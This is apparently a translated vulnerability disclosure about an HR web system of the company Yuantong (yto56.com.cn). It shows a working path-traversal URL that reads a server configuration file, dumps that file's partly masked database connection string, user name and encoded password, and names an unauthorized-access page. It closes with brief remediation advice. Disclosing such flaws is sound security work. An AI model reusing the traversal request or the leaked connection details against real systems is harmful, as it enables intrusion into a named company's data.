A system of yuantong has sensitive information leakage and unauthorized access (case studies)
A system of yuantong has sensitive information leakage and unauthorized access (case studies)
Http://hr.f5.yto56.com.cn/hrss/ELTextFile.load.d? Src =.../ierp/bin/prop. xml
Database ip address, user name, and password leaked (the information has been coded)
falsencClusterhttp./ufjdkmaster-Xms512m -Xmx768m -XX:PermSize=128m -XX:MaxPermSize=256m8005hrapp29081hrapp29444./ufjdkncMem01-Xms512m -Xmx768m -XX:PermSize=128m -XX:MaxPermSize=256m8005hrapp29082hrapp29445./ufjdkncMem03-Xms512m -Xmx768m -XX:PermSize=128m -XX:MaxPermSize=256m8005hrapp29084hrapp29447./ufjdkncMem02-Xms512m -Xmx768m -XX:PermSize=128m -XX:MaxPermSize=256m8005hrapp29083hrapp29446trueStartTomcatnc.bs.tomcat.startup.BootStrapTomcatService15truefalsestart|stopEJB_SERVICEnc.bs.mw.naming.EJBContainerService15truefalsestart|stopnc.bs.mw.tran.IerpTransactionManagerProxync.bs.mw.tran.IerpUserTransactionnc.bs.mw.tran.IerpTransactionManagernc.bs.mw.sql.UFSqlObjectnc.bs.mw.ejbsql.IerpXADataSourceyt_testV2jdbc:oracle:thin:@10.1.xx.xx:1521:ytohrdbyt_testciijfdeddhihebanjdddfijbaxxxxxxoracle.jdbc.OracleDriverORACLE10G5010nc.bs.mw.ejb.xares.IerpDataSourcenc.bs.mw.ejb.xares.IerpXADataSource000webserver_152018940410.1.xx.xx9080httpwebserver_152018940510.1.xx.xx9443https
Unauthorized access page: http://hr.f5.yto56.com.cn/hrss/rm/RmPsnbasdoc.jsp
Solution:
1. Restrict unauthorized Directories
2. Restrict sensitive information configuration files